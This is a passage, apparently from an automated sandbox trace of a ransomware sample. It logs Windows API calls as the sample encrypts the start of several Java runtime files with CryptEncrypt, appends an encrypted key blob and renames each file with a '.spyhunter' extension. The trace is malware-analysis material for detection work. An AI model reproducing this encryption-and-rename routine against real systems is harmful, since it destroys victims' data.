lpBuffer=0x248e4c4*, lpNumberOfBytesWritten=0x248e484*=0x4, lpOverlapped=0x0) returned 1 [0174.335] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e484, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e484*=0x30, lpOverlapped=0x0) returned 1 [0174.335] CloseHandle (hObject=0xb0) returned 1 [0174.338] GetProcessHeap () returned 0x2c0000 [0174.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.339] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\npoji610.dll.spyhunter") returned 63 [0174.339] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\npoji610.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npoji610.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\npoji610.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npoji610.dll.spyhunter")) returned 1 [0174.340] GetProcessHeap () returned 0x2c0000 [0174.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.340] GetProcessHeap () returned 0x2c0000 [0174.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0174.340] GetProcessHeap () returned 0x2c0000 [0174.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3090 | out: hHeap=0x2c0000) returned 1 [0174.341] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4c0 | out: pbBuffer=0x248e4c0) returned 1 [0174.341] GetProcessHeap () returned 0x2c0000 [0174.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0174.341] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4b8*=0x30) returned 1 [0174.341] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\msvcr100.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\msvcr100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0174.342] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\msvcr100.dll") returned 53 [0174.342] StrStrW (lpFirst="msvcr100.dll", lpSrch=".txt") returned 0x0 [0174.342] GetProcessHeap () returned 0x2c0000 [0174.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0174.342] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e47c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e47c*=0x2800, lpOverlapped=0x0) returned 1 [0174.344] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.344] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e47c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e47c*=0x2800, lpOverlapped=0x0) returned 1 [0174.344] GetProcessHeap () returned 0x2c0000 [0174.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0174.344] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.344] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e47c, lpOverlapped=0x0 | out: lpBuffer=0x248e4bc*, lpNumberOfBytesWritten=0x248e47c*=0x4, lpOverlapped=0x0) returned 1 [0174.406] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e47c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e47c*=0x30, lpOverlapped=0x0) returned 1 [0174.406] CloseHandle (hObject=0xb0) returned 1 [0174.406] GetProcessHeap () returned 0x2c0000 [0174.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.406] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\msvcr100.dll.spyhunter") returned 63 [0174.406] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\msvcr100.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\msvcr100.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\msvcr100.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\msvcr100.dll.spyhunter")) returned 1 [0174.407] GetProcessHeap () returned 0x2c0000 [0174.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.407] GetProcessHeap () returned 0x2c0000 [0174.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0174.407] GetProcessHeap () returned 0x2c0000 [0174.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed2fd8 | out: hHeap=0x2c0000) returned 1 [0174.407] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4c0 | out: pbBuffer=0x248e4c0) returned 1 [0174.407] GetProcessHeap () returned 0x2c0000 [0174.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0174.407] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4b8*=0x30) returned 1 [0174.407] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\libxml2.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\libxml2.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0174.408] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\libxml2.dll") returned 52 [0174.408] StrStrW (lpFirst="libxml2.dll", lpSrch=".txt") returned 0x0 [0174.408] GetProcessHeap () returned 0x2c0000 [0174.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.408] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e47c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e47c*=0x2800, lpOverlapped=0x0) returned 1 [0174.421] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.422] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e47c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e47c*=0x2800, lpOverlapped=0x0) returned 1 [0174.422] GetProcessHeap () returned 0x2c0000 [0174.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.422] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.422] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e47c, lpOverlapped=0x0 | out: lpBuffer=0x248e4bc*, lpNumberOfBytesWritten=0x248e47c*=0x4, lpOverlapped=0x0) returned 1 [0174.433] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e47c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e47c*=0x30, lpOverlapped=0x0) returned 1 [0174.433] CloseHandle (hObject=0xb0) returned 1 [0174.481] GetProcessHeap () returned 0x2c0000 [0174.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.481] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\libxml2.dll.spyhunter") returned 62 [0174.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\libxml2.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\libxml2.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\libxml2.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\libxml2.dll.spyhunter")) returned 1 [0174.482] GetProcessHeap () returned 0x2c0000 [0174.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.482] GetProcessHeap () returned 0x2c0000 [0174.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0174.482] GetProcessHeap () returned 0x2c0000 [0174.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed2cf8 | out: hHeap=0x2c0000) returned 1 [0174.482] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4b8 | out: pbBuffer=0x248e4b8) returned 1 [0174.482] GetProcessHeap () returned 0x2c0000 [0174.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0174.483] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4b0*=0x30) returned 1 [0174.483] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\kinit.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\kinit.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0174.484] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\kinit.exe") returned 50 [0174.484] StrStrW (lpFirst="kinit.exe", lpSrch=".txt") returned 0x0 [0174.484] GetProcessHeap () returned 0x2c0000 [0174.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0174.484] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e474, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e474*=0x2800, lpOverlapped=0x0) returned 1 [0174.501] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.502] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e474, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e474*=0x2800, lpOverlapped=0x0) returned 1 [0174.502] GetProcessHeap () returned 0x2c0000 [0174.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0174.502] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.502] WriteFile (in: hFile=0xa0, lpBuffer=0x248e4b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e474, lpOverlapped=0x0 | out: lpBuffer=0x248e4b4*, lpNumberOfBytesWritten=0x248e474*=0x4, lpOverlapped=0x0) returned 1 [0174.508] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e474, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e474*=0x30, lpOverlapped=0x0) returned 1 [0174.508] CloseHandle (hObject=0xa0) returned 1 [0174.508] GetProcessHeap () returned 0x2c0000 [0174.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.508] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\kinit.exe.spyhunter") returned 60 [0174.508] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\kinit.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\kinit.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\kinit.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\kinit.exe.spyhunter")) returned 1 [0174.510] GetProcessHeap () returned 0x2c0000 [0174.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.510] GetProcessHeap () returned 0x2c0000 [0174.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0174.510] GetProcessHeap () returned 0x2c0000 [0174.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21570 | out: hHeap=0x2c0000) returned 1 [0174.510] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4b8 | out: pbBuffer=0x248e4b8) returned 1 [0174.510] GetProcessHeap () returned 0x2c0000 [0174.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0174.510] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4b0*=0x30) returned 1 [0174.510] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jsoundds.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsoundds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0174.511] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jsoundds.dll") returned 53 [0174.511] StrStrW (lpFirst="jsoundds.dll", lpSrch=".txt") returned 0x0 [0174.511] GetProcessHeap () returned 0x2c0000 [0174.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0174.512] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e474, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e474*=0x2800, lpOverlapped=0x0) returned 1 [0174.518] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.518] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e474, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e474*=0x2800, lpOverlapped=0x0) returned 1 [0174.518] GetProcessHeap () returned 0x2c0000 [0174.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0174.518] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.518] WriteFile (in: hFile=0xa0, lpBuffer=0x248e4b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e474, lpOverlapped=0x0 | out: lpBuffer=0x248e4b4*, lpNumberOfBytesWritten=0x248e474*=0x4, lpOverlapped=0x0) returned 1 [0174.521] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e474, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e474*=0x30, lpOverlapped=0x0) returned 1 [0174.521] CloseHandle (hObject=0xa0) returned 1 [0174.521] GetProcessHeap () returned 0x2c0000 [0174.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.521] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jsoundds.dll.spyhunter") returned 63 [0174.521] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jsoundds.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsoundds.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jsoundds.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsoundds.dll.spyhunter")) returned 1 [0174.523] GetProcessHeap () returned 0x2c0000 [0174.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.523] GetProcessHeap () returned 0x2c0000 [0174.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0174.523] GetProcessHeap () returned 0x2c0000 [0174.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed2b88 | out: hHeap=0x2c0000) returned 1 [0174.523] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4b0 | out: pbBuffer=0x248e4b0) returned 1 [0174.523] GetProcessHeap () returned 0x2c0000 [0174.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0174.523] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4a8*=0x30) returned 1 [0174.523] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jsdt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsdt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0174.525] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jsdt.dll") returned 49 [0174.525] StrStrW (lpFirst="jsdt.dll", lpSrch=".txt") returned 0x0 [0174.525] GetProcessHeap () returned 0x2c0000 [0174.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0174.525] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e46c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e46c*=0x2800, lpOverlapped=0x0) returned 1 [0174.527] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.527] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e46c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e46c*=0x2800, lpOverlapped=0x0) returned 1 [0174.527] GetProcessHeap () returned 0x2c0000 [0174.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0174.527] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.527] WriteFile (in: hFile=0xa0, lpBuffer=0x248e4ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e46c, lpOverlapped=0x0 | out: lpBuffer=0x248e4ac*, lpNumberOfBytesWritten=0x248e46c*=0x4, lpOverlapped=0x0) returned 1 [0174.528] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e46c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e46c*=0x30, lpOverlapped=0x0) returned 1 [0174.528] CloseHandle (hObject=0xa0) returned 1 [0174.528] GetProcessHeap () returned 0x2c0000 [0174.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.528] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jsdt.dll.spyhunter") returned 59 [0174.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jsdt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsdt.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jsdt.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsdt.dll.spyhunter")) returned 1 [0174.530] GetProcessHeap () returned 0x2c0000 [0174.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.580] GetProcessHeap () returned 0x2c0000 [0174.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0174.580] GetProcessHeap () returned 0x2c0000 [0174.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21360 | out: hHeap=0x2c0000) returned 1 [0174.580] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4b0 | out: pbBuffer=0x248e4b0) returned 1 [0174.580] GetProcessHeap () returned 0x2c0000 [0174.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0174.580] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4a8*=0x30) returned 1 [0174.580] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpiexp.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpiexp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0174.581] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpiexp.dll") returned 51 [0174.581] StrStrW (lpFirst="jpiexp.dll", lpSrch=".txt") returned 0x0 [0174.581] GetProcessHeap () returned 0x2c0000 [0174.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.581] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e46c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e46c*=0x2800, lpOverlapped=0x0) returned 1 [0174.582] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.582] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e46c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e46c*=0x2800, lpOverlapped=0x0) returned 1 [0174.582] GetProcessHeap () returned 0x2c0000 [0174.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.583] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.583] WriteFile (in: hFile=0xa0, lpBuffer=0x248e4ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e46c, lpOverlapped=0x0 | out: lpBuffer=0x248e4ac*, lpNumberOfBytesWritten=0x248e46c*=0x4, lpOverlapped=0x0) returned 1 [0174.594] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e46c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e46c*=0x30, lpOverlapped=0x0) returned 1 [0174.594] CloseHandle (hObject=0xa0) returned 1 [0174.594] GetProcessHeap () returned 0x2c0000 [0174.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.595] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpiexp.dll.spyhunter") returned 61 [0174.595] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpiexp.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpiexp.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpiexp.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpiexp.dll.spyhunter")) returned 1 [0174.596] GetProcessHeap () returned 0x2c0000 [0174.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.596] GetProcessHeap () returned 0x2c0000 [0174.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0174.596] GetProcessHeap () returned 0x2c0000 [0174.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21150 | out: hHeap=0x2c0000) returned 1 [0174.596] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4a8 | out: pbBuffer=0x248e4a8) returned 1 [0174.596] GetProcessHeap () returned 0x2c0000 [0174.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0174.596] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4a0*=0x30) returned 1 [0174.608] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpeg.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpeg.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 